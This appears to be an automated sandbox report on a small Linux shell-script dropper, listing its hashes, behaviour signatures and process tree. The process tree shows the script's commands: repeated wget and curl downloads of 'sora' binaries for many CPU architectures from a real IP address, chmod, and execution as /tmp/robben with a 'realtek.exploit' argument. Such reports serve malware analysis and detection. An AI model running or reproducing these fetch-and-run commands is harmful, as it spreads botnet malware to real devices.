Analysis

max time kernel:   83s
max time network:  86s
platform:          debian-9_mips
resource:          debian9-mipsbe-20240611-en
resource tags:     arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted:         18/10/2024, 02:36
Tasks

Static task:      static1
Behavioral task:  behavioral1  Sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh  Resource: ubuntu1804-amd64-20240611-en
Behavioral task:  behavioral2  Sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh  Resource: debian9-armhf-20240418-en
Behavioral task:  behavioral3  Sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh  Resource: debian9-mipsbe-20240611-en
Behavioral task:  behavioral4  Sample: bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh  Resource: debian9-mipsel-20240611-en
General

Target:  bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Size:    2KB
MD5:     2a963ff4fb99086ab454f4f26acf8b74
SHA1:    0830412185a29f4230a85d8f6eb4d15f2a165aea
SHA256:  bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
SHA512:  7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1
Malware Config
Signatures
-
File and Directory Permissions Modification (1 TTPs, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.

PID   Process
755   chmod
783   chmod
836   chmod
851   chmod
734   chmod
746   chmod
842   chmod
867   chmod
727   chmod
823   chmod
767   chmod
830   chmod
740   chmod
805   chmod
Executes dropped EXE (14 IoCs)

IoC          PID   Process
/tmp/robben  728   robben
/tmp/robben  735   robben
/tmp/robben  741   robben
/tmp/robben  747   robben
/tmp/robben  756   robben
/tmp/robben  768   robben
/tmp/robben  784   robben
/tmp/robben  806   robben
/tmp/robben  824   robben
/tmp/robben  831   robben
/tmp/robben  837   robben
/tmp/robben  843   robben
/tmp/robben  852   robben
/tmp/robben  868   robben
Reads runtime system information (14 IoCs)

Description               IoC                              Process
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
File opened for reading   /proc/sys/crypto/fips_enabled    curl
System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.

PID   Process
730   wget
731   curl
733   cat
Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.

Description                    IoC           Process
File opened for modification   /tmp/robben   bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Processes

/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh  /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh  [PID 697]
  - Writes file to tmp directory

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86  [PID 703]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86  [PID 719]
    - Reads runtime system information

  /bin/cat  cat sora.x86  [PID 725]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6  [PID 727]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 728]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mips  [PID 730]
    - System Network Configuration Discovery

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mips  [PID 731]
    - Reads runtime system information
    - System Network Configuration Discovery

  /bin/cat  cat sora.mips  [PID 733]
    - System Network Configuration Discovery

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6  [PID 734]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 735]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86_64  [PID 737]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86_64  [PID 738]
    - Reads runtime system information

  /bin/cat  cat sora.x86_64  [PID 739]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6  [PID 740]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 741]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i468  [PID 743]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i468  [PID 744]
    - Reads runtime system information

  /bin/cat  cat sora.i468  [PID 745]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6  [PID 746]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 747]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i686  [PID 749]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i686  [PID 750]
    - Reads runtime system information

  /bin/cat  cat sora.i686  [PID 754]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 755]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 756]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mpsl  [PID 758]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mpsl  [PID 759]
    - Reads runtime system information

  /bin/cat  cat sora.mpsl  [PID 766]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 767]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 768]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm4  [PID 771]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm4  [PID 774]
    - Reads runtime system information

  /bin/cat  cat sora.arm4  [PID 781]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 783]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 784]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm5  [PID 786]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm5  [PID 795]
    - Reads runtime system information

  /bin/cat  cat sora.arm5  [PID 804]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 805]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 806]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm6  [PID 809]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm6  [PID 815]
    - Reads runtime system information

  /bin/cat  cat sora.arm6  [PID 822]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 823]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 824]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm7  [PID 826]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm7  [PID 828]
    - Reads runtime system information

  /bin/cat  cat sora.arm7  [PID 829]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 830]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 831]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc  [PID 833]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc  [PID 834]
    - Reads runtime system information

  /bin/cat  cat sora.ppc  [PID 835]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 836]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 837]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc440fp  [PID 839]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc440fp  [PID 840]
    - Reads runtime system information

  /bin/cat  cat sora.ppc440fp  [PID 841]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 842]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 843]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.m68k  [PID 845]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.m68k  [PID 846]
    - Reads runtime system information

  /bin/cat  cat sora.m68k  [PID 849]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 851]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 852]
    - Executes dropped EXE

  /usr/bin/wget  wget http://93.123.85.141/bins/sora.sh4  [PID 855]

  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.sh4  [PID 858]
    - Reads runtime system information

  /bin/cat  cat sora.sh4  [PID 865]

  /bin/chmod  chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben  [PID 867]
    - File and Directory Permissions Modification

  /tmp/robben  ./robben realtek.exploit  [PID 868]
    - Executes dropped EXE